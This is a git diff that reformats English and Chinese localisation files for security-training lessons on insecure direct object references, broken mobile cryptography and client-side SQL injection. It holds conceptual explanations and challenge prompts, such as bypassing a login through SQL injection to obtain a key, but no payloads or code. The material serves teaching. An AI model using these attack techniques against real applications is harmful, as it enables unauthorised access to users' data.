+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u901A\u8FC7\u8BE5\u8BFE\u7A0B\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u8BA4\u4E3A\u662F\u4E0D\u5E94\u8BE5\u5411\u5927\u4F17\u516C\u5F00\u7684,\u5F00\u53D1\u4EBA\u5458\u5DF2\u7ECF\u5C06\u7ED3\u679C\u5BC6\u5319\u4EE5<a>base64</a>\u65B9\u5F0F\u52A0\u5BC6\u4E86,\u6062\u590D\u5BC6\u5319\u6765\u5B8C\u6210\u8BE5\u8BFE.
diff --git a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties
index 97905724e..29e66bd0c 100644
--- a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties
+++ b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties
@@ -1,18 +1,23 @@
-title.quesetion.insecure_direct_object_ref=What are Insecure Direct Object References?
-paragraph.info1=Imagine a web page that allows you to view your personal information. The web page that shows the user their information is generated based on a user ID. If this page was vulnerable to <a>insecure Direct Object References</a> an attacker would be able to modify the user identifier parameter to reference any user object in the system. Insecure Direct Object References occur when an application references an object by its actual ID or name. This object that is referenced directly is used to generate a web page. If the application does not verify that the user is allowed to reference this object, then the object is <a>insecurely referenced</a>.
-paragraph.info2=Attackers can use insecure object references to compromise any information that can be referenced by the parameter in question. In the above example, the attacker can access any user's personal information.
-paragraph.info3=The severity of insecure direct object references varies depending on the data that is compromised. If the compromised data is publicly available or not supposed to be restricted, it becomes a very low severity vulnerability. Consider a scenario where one company is able to retrieve their competitor's information. Suddenly, the business impact of the vulnerability is critical. These vulnerabilities still need to be fixed and should never be found in professional grade applications.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-sign.loading=Loading
-sign.hint=Would you link a hint
-challenge.description=The result key to complete this lesson is stored in the administrators profile.
-challenge.refresh=Refresh your Profile
-challenge.userTitle=User
-challenge.guest=Guest
-challenge.age=Age
-challenge.address=Address
-challenge.email=Email
-challenge.message=Private Message
-challenge.noMessage=No Private Message Set
-generic.error=An Error Occurred
\ No newline at end of file
+title.quesetion.insecure_direct_object_ref = What are Insecure Direct Object References?
+
+paragraph.info1 = Imagine a web page that allows you to view your personal information. The web page that shows the user their information is generated based on a user ID. If this page was vulnerable to <a>insecure Direct Object References</a> an attacker would be able to modify the user identifier parameter to reference any user object in the system. Insecure Direct Object References occur when an application references an object by its actual ID or name. This object that is referenced directly is used to generate a web page. If the application does not verify that the user is allowed to reference this object, then the object is <a>insecurely referenced</a>.
+paragraph.info2 = Attackers can use insecure object references to compromise any information that can be referenced by the parameter in question. In the above example, the attacker can access any user's personal information.
+paragraph.info3 = The severity of insecure direct object references varies depending on the data that is compromised. If the compromised data is publicly available or not supposed to be restricted, it becomes a very low severity vulnerability. Consider a scenario where one company is able to retrieve their competitor's information. Suddenly, the business impact of the vulnerability is critical. These vulnerabilities still need to be fixed and should never be found in professional grade applications.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+sign.loading = Loading
+sign.hint = Would you link a hint
+
+challenge.description = The result key to complete this lesson is stored in the administrators profile.
+challenge.refresh = Refresh your Profile
+challenge.userTitle = User
+challenge.guest = Guest
+challenge.age = Age
+challenge.address = Address
+challenge.email = Email
+challenge.message = Private Message
+challenge.noMessage = No Private Message Set
+
+generic.error = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties
index 01aa9003e..7a18d6744 100644
--- a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties
+++ b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties
@@ -1,19 +1,25 @@
-title.quesetion.insecure_direct_object_ref=\u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528?
-paragraph.info1=\u60F3\u8C61\u4E00\u4E2A\u5141\u8BB8\u60A8\u67E5\u770B\u60A8\u7684\u4E2A\u4EBA\u4FE1\u606F\u7684\u7F51\u9875.\u8BE5\u7F51\u9875\u4E0A\u663E\u793A\u7528\u6237\u7684\u4FE1\u606F\u662F\u4EA7\u751F\u4E8E\u7528\u6237\u7684 ID.\u5982\u679C\u8FD9\u4E2A\u9875\u9762\u662F\u5B58\u5728<a>\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528</a>\u6F0F\u6D1E,\u90A3\u4E48\u653B\u51FB\u8005\u5C06\u80FD\u591F\u4FEE\u6539\u7528\u6237\u6807\u8BC6\u7B26\u53C2\u6570\u53BB\u5F15\u7528\u5728\u8BE5\u7CFB\u7EDF\u4E2D\u7684\u4EFB\u4F55\u7528\u6237\u5BF9\u8C61.\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u901A\u8FC7\u5B83\u7684\u5B9E\u9645\u7F16\u53F7\u6216\u540D\u79F0\u5F15\u7528\u5BF9\u8C61.\u800C\u8FD9\u4E2A\u88AB\u76F4\u63A5\u5F15\u7528\u7684\u5BF9\u8C61\u5219\u88AB\u7528\u6765\u751F\u6210\u4E00\u4E2A\u7F51\u9875.\u5982\u679C\u5E94\u7528\u7A0B\u5E8F\u4E0D\u9A8C\u8BC1,\u8BE5\u7528\u6237\u88AB\u5141\u8BB8\u5F15\u7528\u8FD9\u4E2A\u5BF9\u8C61,\u5219\u8BE5\u5BF9\u8C61\u662F\u003C\u0061\u003E\u4E0D\u5B89\u5168\u5F15\u7528\u003C\u002F\u0041\u003E.
-paragraph.info2=\u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u4E0D\u5B89\u5168\u7684\u5BF9\u8C61\u5F15\u7528\u5C06\u7834\u574F\u4EFB\u610F\u53EF\u4EE5\u88AB\u76F8\u5E94\u7684\u53C2\u6570\u6240\u5F15\u7528\u7684\u4EFB\u4F55\u4FE1\u606F.\u5728\u4E0A\u9762\u7684\u4F8B\u5B50\u4E2D,\u653B\u51FB\u8005\u53EF\u4EE5\u8BBF\u95EE\u4EFB\u4F55\u7528\u6237\u7684\u4E2A\u4EBA\u4FE1\u606F.
-paragraph.info3=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u7684\u4E25\u91CD\u7A0B\u5EA6\u53D6\u51B3\u4E8E\u88AB\u7834\u574F\u6570\u636E\u4EA7\u751F\u7684\u5F71\u54CD.\u8003\u8651\u8FD9\u6837\u4E00\u79CD\u60C5\u51B5\uFF0C\u4E00\u4E2A\u516C\u53F8\u80FD\u591F\u83B7\u53D6\u81EA\u5DF1\u7ADE\u4E89\u5BF9\u624B\u516C\u53F8\u7684\u4FE1\u606F.\u8FD9\u65F6,\u8BE5\u6F0F\u6D1E\u5BF9\u5546\u4E1A\u7684\u5F71\u54CD\u662F\u5DE8\u5927\u7684.\u8FD9\u4E9B\u6F0F\u6D1E\u662F\u5FC5\u987B\u8981\u4FEE\u590D,\u5E76\u4E14\u4E0D\u5E94\u8BE5\u51FA\u73B0\u5728\u4E13\u4E1A\u7EA7\u7684\u7A0B\u5E8F\u4E2D\u7684.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-sign.loading=\u8BF7\u7A0D\u4FAF
-sign.hint=\u9700\u8981\u63D0\u793A\u5417
-challenge.description=\u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319\u88AB\u50A8\u5B58\u5728\u7BA1\u7406\u5458\u7684\u4E2A\u4EBA\u8D44\u6599\u4E2D.
-challenge.refresh=\u5237\u65B0\u4F60\u7684\u4E2A\u4EBA\u8D44\u6599
-challenge.userTitle=\u7528\u6237
-challenge.guest=\u6E38\u5BA2
-challenge.age=\u5E74\u9F84
-challenge.address=\u4F4F\u5740
-challenge.email=\u90AE\u7BB1
-challenge.message=\u4E2A\u4EBA\u4FE1\u606F
-challenge.noMessage=\u6CA1\u6709\u4E2A\u4EBA\u4FE1\u606F\u8BBE\u7F6E
-generic.error=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+title.quesetion.insecure_direct_object_ref = \u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528?
+
+paragraph.info1 = \u60F3\u8C61\u4E00\u4E2A\u5141\u8BB8\u60A8\u67E5\u770B\u60A8\u7684\u4E2A\u4EBA\u4FE1\u606F\u7684\u7F51\u9875.\u8BE5\u7F51\u9875\u4E0A\u663E\u793A\u7528\u6237\u7684\u4FE1\u606F\u662F\u4EA7\u751F\u4E8E\u7528\u6237\u7684 ID.\u5982\u679C\u8FD9\u4E2A\u9875\u9762\u662F\u5B58\u5728<a>\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528</a>\u6F0F\u6D1E,\u90A3\u4E48\u653B\u51FB\u8005\u5C06\u80FD\u591F\u4FEE\u6539\u7528\u6237\u6807\u8BC6\u7B26\u53C2\u6570\u53BB\u5F15\u7528\u5728\u8BE5\u7CFB\u7EDF\u4E2D\u7684\u4EFB\u4F55\u7528\u6237\u5BF9\u8C61.\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u901A\u8FC7\u5B83\u7684\u5B9E\u9645\u7F16\u53F7\u6216\u540D\u79F0\u5F15\u7528\u5BF9\u8C61.\u800C\u8FD9\u4E2A\u88AB\u76F4\u63A5\u5F15\u7528\u7684\u5BF9\u8C61\u5219\u88AB\u7528\u6765\u751F\u6210\u4E00\u4E2A\u7F51\u9875.\u5982\u679C\u5E94\u7528\u7A0B\u5E8F\u4E0D\u9A8C\u8BC1,\u8BE5\u7528\u6237\u88AB\u5141\u8BB8\u5F15\u7528\u8FD9\u4E2A\u5BF9\u8C61,\u5219\u8BE5\u5BF9\u8C61\u662F\u003C\u0061\u003E\u4E0D\u5B89\u5168\u5F15\u7528\u003C\u002F\u0041\u003E.
+paragraph.info2 = \u653B\u51FB\u8005\u53EF\u4EE5\u5229\u7528\u4E0D\u5B89\u5168\u7684\u5BF9\u8C61\u5F15\u7528\u5C06\u7834\u574F\u4EFB\u610F\u53EF\u4EE5\u88AB\u76F8\u5E94\u7684\u53C2\u6570\u6240\u5F15\u7528\u7684\u4EFB\u4F55\u4FE1\u606F.\u5728\u4E0A\u9762\u7684\u4F8B\u5B50\u4E2D,\u653B\u51FB\u8005\u53EF\u4EE5\u8BBF\u95EE\u4EFB\u4F55\u7528\u6237\u7684\u4E2A\u4EBA\u4FE1\u606F.
+paragraph.info3 = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528\u7684\u4E25\u91CD\u7A0B\u5EA6\u53D6\u51B3\u4E8E\u88AB\u7834\u574F\u6570\u636E\u4EA7\u751F\u7684\u5F71\u54CD.\u8003\u8651\u8FD9\u6837\u4E00\u79CD\u60C5\u51B5\uFF0C\u4E00\u4E2A\u516C\u53F8\u80FD\u591F\u83B7\u53D6\u81EA\u5DF1\u7ADE\u4E89\u5BF9\u624B\u516C\u53F8\u7684\u4FE1\u606F.\u8FD9\u65F6,\u8BE5\u6F0F\u6D1E\u5BF9\u5546\u4E1A\u7684\u5F71\u54CD\u662F\u5DE8\u5927\u7684.\u8FD9\u4E9B\u6F0F\u6D1E\u662F\u5FC5\u987B\u8981\u4FEE\u590D,\u5E76\u4E14\u4E0D\u5E94\u8BE5\u51FA\u73B0\u5728\u4E13\u4E1A\u7EA7\u7684\u7A0B\u5E8F\u4E2D\u7684.
+
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+sign.loading = \u8BF7\u7A0D\u4FAF
+sign.hint = \u9700\u8981\u63D0\u793A\u5417
+
+challenge.description = \u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319\u88AB\u50A8\u5B58\u5728\u7BA1\u7406\u5458\u7684\u4E2A\u4EBA\u8D44\u6599\u4E2D.
+challenge.refresh = \u5237\u65B0\u4F60\u7684\u4E2A\u4EBA\u8D44\u6599
+challenge.userTitle = \u7528\u6237
+challenge.guest = \u6E38\u5BA2
+challenge.age = \u5E74\u9F84
+challenge.address = \u4F4F\u5740
+challenge.email = \u90AE\u7BB1
+challenge.message = \u4E2A\u4EBA\u4FE1\u606F
+challenge.noMessage = \u6CA1\u6709\u4E2A\u4EBA\u4FE1\u606F\u8BBE\u7F6E
+
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
 
diff --git a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties
index 7e97792bd..8392f4881 100644
--- a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties
+++ b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.properties
@@ -1,6 +1,9 @@
-title.question.mobile_broken_crypto=What is Mobile Broken Crypto?
-paragraph.info1=Cryptography is difficult to get right, as a result many Apps use cryptography poorly and become vulnerable to attack. An App can transfer encryption keys insecurely, use a known broken or deprecated cryptographic algorithm or developers can create their own Crypto algorithms.
-paragraph.info2=Poor key management can be due to hard coded keys, keys stored in directories, transferring the key in an insecure way or using the same key all the time. If the developers of an App make use a of custom, unproven, untested encryption algorithm then it is highly likely that the encrypted data is vulnerable.
-challenge.description=The developers of this App are holding a competition, whoever can crack their secure chat wins. Unfortunately, the developers have misunderstood the definition of Cryptography. Reduce the intercepted messages exchanged to plain text to reveal the key.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.mobile_broken_crypto = What is Mobile Broken Crypto?
+
+paragraph.info1 = Cryptography is difficult to get right, as a result many Apps use cryptography poorly and become vulnerable to attack. An App can transfer encryption keys insecurely, use a known broken or deprecated cryptographic algorithm or developers can create their own Crypto algorithms.
+paragraph.info2 = Poor key management can be due to hard coded keys, keys stored in directories, transferring the key in an insecure way or using the same key all the time. If the developers of an App make use a of custom, unproven, untested encryption algorithm then it is highly likely that the encrypted data is vulnerable.
+
+challenge.description = The developers of this App are holding a competition, whoever can crack their secure chat wins. Unfortunately, the developers have misunderstood the definition of Cryptography. Reduce the intercepted messages exchanged to plain text to reveal the key.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties
index 33cd190f8..d84d740b9 100644
--- a/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties
+++ b/src/main/resources/i18n/lessons/m_broken_crypto/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212_zh.properties
@@ -1,6 +1,9 @@
-title.question.mobile_broken_crypto=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u52A0\u5BC6?
-paragraph.info1=\u52A0\u5BC6\u6280\u672F\u662F\u5F88\u96BE\u6B63\u786E\u9009\u62E9\u7684,\u56E0\u6B64\u8BB8\u591A\u5E94\u7528\u7A0B\u5E8F\u4F7F\u7528\u4E0D\u4F73\u7684\u52A0\u5BC6\u6280\u672F,\u4ECE\u800C\u6210\u4E3A\u5BB9\u6613\u53D7\u5230\u653B\u51FB\u7684\u5BF9\u8C61.\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u53EF\u4EE5\u4E0D\u5B89\u5168\u5730\u4F20\u8F93\u52A0\u5BC6\u94A5\u5319,\u6BD4\u5982\u4F7F\u7528\u4E00\u4E2A\u5DF2\u77E5\u7684\u635F\u574F\u7684\u6216\u5DF2\u8FC7\u65F6\u7684\u52A0\u5BC6\u7B97\u6CD5\u6216\u5F00\u53D1\u4EBA\u5458\u521B\u5EFA\u4ED6\u4EEC\u81EA\u5DF1\u7684\u52A0\u5BC6\u7B97\u6CD5.
-paragraph.info2=\u4E0D\u5B8C\u5584\u7684\u5BC6\u5319\u7BA1\u7406\u53EF\u80FD\u662F\u7531\u4E8E\u786C\u7684\u7F16\u7801\u94A5\u5319,\u5B58\u50A8\u5728\u76EE\u5F55\u4E2D\u7684\u94A5\u5319,\u4EE5\u4E0D\u5B89\u5168\u7684\u65B9\u5F0F\u4F20\u9001\u5BC6\u94A5\u6216\u603B\u662F\u4F7F\u7528\u76F8\u540C\u7684\u5BC6\u94A5.\u5982\u679C\u4E00\u4E2A App \u7684\u5F00\u53D1\u4EBA\u5458\u4F7F\u7528\u81EA\u5B9A\u4E49\u7684, \u672A\u7ECF\u9A8C\u8BC1\u7684, \u672A\u6D4B\u8BD5\u7684\u52A0\u5BC6\u7B97\u6CD5\u5219\u5927\u5927\u52A0\u5927\u4E86\u52A0\u5BC6\u6570\u636E\u53EF\u653B\u51FB\u7684\u53EF\u80FD\u6027.
-challenge.description=\u8FD9\u4E2A\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u5728\u4E3E\u884C\u4E00\u573A\u6BD4\u8D5B,\u65E0\u8BBA\u8C01\u53EF\u4EE5\u7834\u89E3\u4ED6\u4EEC\u7684\u5B89\u5168\u804A\u5929,\u8C01\u5C31\u80DC\u51FA. \u4F46\u95EE\u9898\u662F,\u5F00\u53D1\u4EBA\u5458\u8BEF\u89E3\u4E86\u52A0\u5BC6\u6280\u672F, \u4F60\u9700\u8981\u901A\u8FC7\u7B80\u5316\u88AB\u62E6\u622A\u7684\u4FE1\u606F\u5E76\u6362\u6210\u660E\u6587\u4FE1\u606F\u6765\u83B7\u53D6\u94A5\u5319.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
+title.question.mobile_broken_crypto = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u52A0\u5BC6?
+
+paragraph.info1 = \u52A0\u5BC6\u6280\u672F\u662F\u5F88\u96BE\u6B63\u786E\u9009\u62E9\u7684,\u56E0\u6B64\u8BB8\u591A\u5E94\u7528\u7A0B\u5E8F\u4F7F\u7528\u4E0D\u4F73\u7684\u52A0\u5BC6\u6280\u672F,\u4ECE\u800C\u6210\u4E3A\u5BB9\u6613\u53D7\u5230\u653B\u51FB\u7684\u5BF9\u8C61.\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u53EF\u4EE5\u4E0D\u5B89\u5168\u5730\u4F20\u8F93\u52A0\u5BC6\u94A5\u5319,\u6BD4\u5982\u4F7F\u7528\u4E00\u4E2A\u5DF2\u77E5\u7684\u635F\u574F\u7684\u6216\u5DF2\u8FC7\u65F6\u7684\u52A0\u5BC6\u7B97\u6CD5\u6216\u5F00\u53D1\u4EBA\u5458\u521B\u5EFA\u4ED6\u4EEC\u81EA\u5DF1\u7684\u52A0\u5BC6\u7B97\u6CD5.
+paragraph.info2 = \u4E0D\u5B8C\u5584\u7684\u5BC6\u5319\u7BA1\u7406\u53EF\u80FD\u662F\u7531\u4E8E\u786C\u7684\u7F16\u7801\u94A5\u5319,\u5B58\u50A8\u5728\u76EE\u5F55\u4E2D\u7684\u94A5\u5319,\u4EE5\u4E0D\u5B89\u5168\u7684\u65B9\u5F0F\u4F20\u9001\u5BC6\u94A5\u6216\u603B\u662F\u4F7F\u7528\u76F8\u540C\u7684\u5BC6\u94A5.\u5982\u679C\u4E00\u4E2A App \u7684\u5F00\u53D1\u4EBA\u5458\u4F7F\u7528\u81EA\u5B9A\u4E49\u7684, \u672A\u7ECF\u9A8C\u8BC1\u7684, \u672A\u6D4B\u8BD5\u7684\u52A0\u5BC6\u7B97\u6CD5\u5219\u5927\u5927\u52A0\u5927\u4E86\u52A0\u5BC6\u6570\u636E\u53EF\u653B\u51FB\u7684\u53EF\u80FD\u6027.
+
+challenge.description = \u8FD9\u4E2A\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u5728\u4E3E\u884C\u4E00\u573A\u6BD4\u8D5B,\u65E0\u8BBA\u8C01\u53EF\u4EE5\u7834\u89E3\u4ED6\u4EEC\u7684\u5B89\u5168\u804A\u5929,\u8C01\u5C31\u80DC\u51FA. \u4F46\u95EE\u9898\u662F,\u5F00\u53D1\u4EBA\u5458\u8BEF\u89E3\u4E86\u52A0\u5BC6\u6280\u672F, \u4F60\u9700\u8981\u901A\u8FC7\u7B80\u5316\u88AB\u62E6\u622A\u7684\u4FE1\u606F\u5E76\u6362\u6210\u660E\u6587\u4FE1\u606F\u6765\u83B7\u53D6\u94A5\u5319.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties
index b3b10fc7f..9ba939f0c 100644
--- a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties
+++ b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.properties
@@ -1,7 +1,10 @@
-title.question.csi=What is Mobile Client Side Injection?
-paragraph.info.1=<a>Client Side Injection</a> occurs when the user can execute <a>SQLite</a> commands through application input in order to change the query run by an App. The APK for this lesson encrypts it's databases using <a>AES</a>. It would be difficult to steal login details by attacking the encryption but a lot easier to use SQL Injection to bypass the login.
-paragraph.info.2=An ineffective defense against Client Side Injection is <a>Filtering user input</a>. This technique involves trying to predict the query which an attacker would execute and then replacing key words like SELECT, WHERE, FROM with a dot or blank space. Filtering will make it more difficult for an attacker to exploit an injection flaw but will not stop.
-paragraph.info.3=A security system is only as strongest as it's weakest link. We don't need to know the user credentials. We do know that the APK uses a textbook example of running an SQL query by appending the Username and Password to a String in a Select statement in order to verify if a Username and Password exist. If this statement returns true, the user is logged in.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Exploit the SQL Injection flaw in this challenge's app to bypass the Client Side Login. Once you manage to log in as the admin, you will get the key.
\ No newline at end of file
+title.question.csi = What is Mobile Client Side Injection?
+
+paragraph.info.1 = <a>Client Side Injection</a> occurs when the user can execute <a>SQLite</a> commands through application input in order to change the query run by an App. The APK for this lesson encrypts it's databases using <a>AES</a>. It would be difficult to steal login details by attacking the encryption but a lot easier to use SQL Injection to bypass the login.
+paragraph.info.2 = An ineffective defense against Client Side Injection is <a>Filtering user input</a>. This technique involves trying to predict the query which an attacker would execute and then replacing key words like SELECT, WHERE, FROM with a dot or blank space. Filtering will make it more difficult for an attacker to exploit an injection flaw but will not stop.
+paragraph.info.3 = A security system is only as strongest as it's weakest link. We don't need to know the user credentials. We do know that the APK uses a textbook example of running an SQL query by appending the Username and Password to a String in a Select statement in order to verify if a Username and Password exist. If this statement returns true, the user is logged in.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Exploit the SQL Injection flaw in this challenge's app to bypass the Client Side Login. Once you manage to log in as the admin, you will get the key.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties
index 24db5a802..49a350be6 100644
--- a/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties
+++ b/src/main/resources/i18n/lessons/m_client_side_injection/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1_zh.properties
@@ -1,7 +1,10 @@
-title.question.csi=\u4EC0\u4E48\u662F\u79FB\u52A8\u5BA2\u6237\u7AEF\u6CE8\u5165?
-paragraph.info.1=<a>\u5BA2\u6237\u7AEF\u767B\u5F55\u6CE8\u5165</a>\u53D1\u751F\u5728\u5F53\u7528\u6237\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8F93\u5165\u53EF\u6267\u884C\u7684,\u53EF\u6539\u53D8\u4E00\u4E2A App \u8FD0\u884C\u67E5\u8BE2\u7684<a>SQLite</a>\u547D\u4EE4. \u8BE5\u8BFE\u7684 APK \u4F7F\u7528 <a>AES</a> \u52A0\u5BC6\u5B83\u7684\u6570\u636E\u5E93. \u8981\u901A\u8FC7\u653B\u51FB\u52A0\u5BC6\u7CFB\u7EDF\u53BB\u7A83\u53D6\u767B\u5F55\u4FE1\u606F\u4F1A\u76F8\u5F53\u56F0\u96BE,\u5982\u82E5\u4F7F\u7528 SQL \u6CE8\u5165\u6765\u7ED5\u8FC7\u767B\u5F55\u5C06\u4F1A\u66F4\u52A0\u7B80\u5355.
-paragraph.info.2=<a>\u8FC7\u6EE4\u7528\u6237\u8F93\u5165</a>\u88AB\u8BA4\u4E3A\u662F\u4E00\u79CD\u65E0\u6548\u7684\u9632\u5FA1\u5BA2\u6237\u7AEF\u6CE8\u5165\u65B9\u6CD5.\u7136\u540E\u66FF\u6362\u6389\u5173\u952E\u8BCD\u50CF SELECT, WHERE, FROM \u548C\u70B9\u6216\u7A7A\u683C. \u8FC7\u6EE4\u5C06\u53EA\u80FD\u4F7F\u653B\u51FB\u8005\u66F4\u96BE\u653B\u7834\u6CE8\u5165\u7F3A\u9677,\u4F46\u5374\u4E0D\u80FD\u963B\u6B62\u5165\u4FB5.
-paragraph.info.3=\u4E00\u4E2A\u5B89\u5168\u7CFB\u7EDF\u53EA\u662F\u53D6\u51B3\u4E8E\u5176\u6700\u8584\u5F31\u7684\u73AF\u8282. \u6B63\u5982\u8C1A\u8BED\u4E00\u73AF\u8F6F\u5F31,\u5168\u94FE\u4E0D\u5F3A.\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u7528\u6237\u7684\u51ED\u8BC1. \u6211\u4EEC\u53EA\u9700\u8981\u77E5\u9053 APK \u4F7F\u7528\u8FD0\u884C\u4E00\u6761 SQL \u67E5\u8BE2\u8BED\u53E5\u4F5C\u4E3A\u7ECF\u5178\u7684\u4F8B\u5B50\u6765\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u540D\u548C\u5BC6\u7801\u662F\u5426\u5B58\u5728, \u901A\u8FC7\u5728\u4E00\u6761 SELECT \u7533\u660E\u4E2D\u9644\u52A0\u7528\u6237\u540D\u548C\u5BC6\u7801\u5230\u4E00\u4E2A String. \u5982\u679C\u8BE5\u7533\u660E\u8FD4\u56DE true,\u5219\u8BE5\u7528\u6237\u5DF2\u767B\u5F55. 
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5229\u7528 SQL \u6CE8\u5165\u5728\u8FD9\u4E2A\u6311\u6218\u7684\u5E94\u7528\u4E2D\u7ED5\u8FC7\u5BA2\u6237\u7AEF\u767B\u5F55.\u4E00\u65E6\u4F60\u4EE5\u4E00\u4E2A\u7BA1\u7406\u5458\u7684\u8EAB\u4EFD\u6210\u529F\u767B\u5F55,\u4F60\u4FBF\u53EF\u4EE5\u83B7\u53D6\u672C\u7AD9\u901A\u5173\u94A5\u5319.
\ No newline at end of file
+title.question.csi = \u4EC0\u4E48\u662F\u79FB\u52A8\u5BA2\u6237\u7AEF\u6CE8\u5165?
+
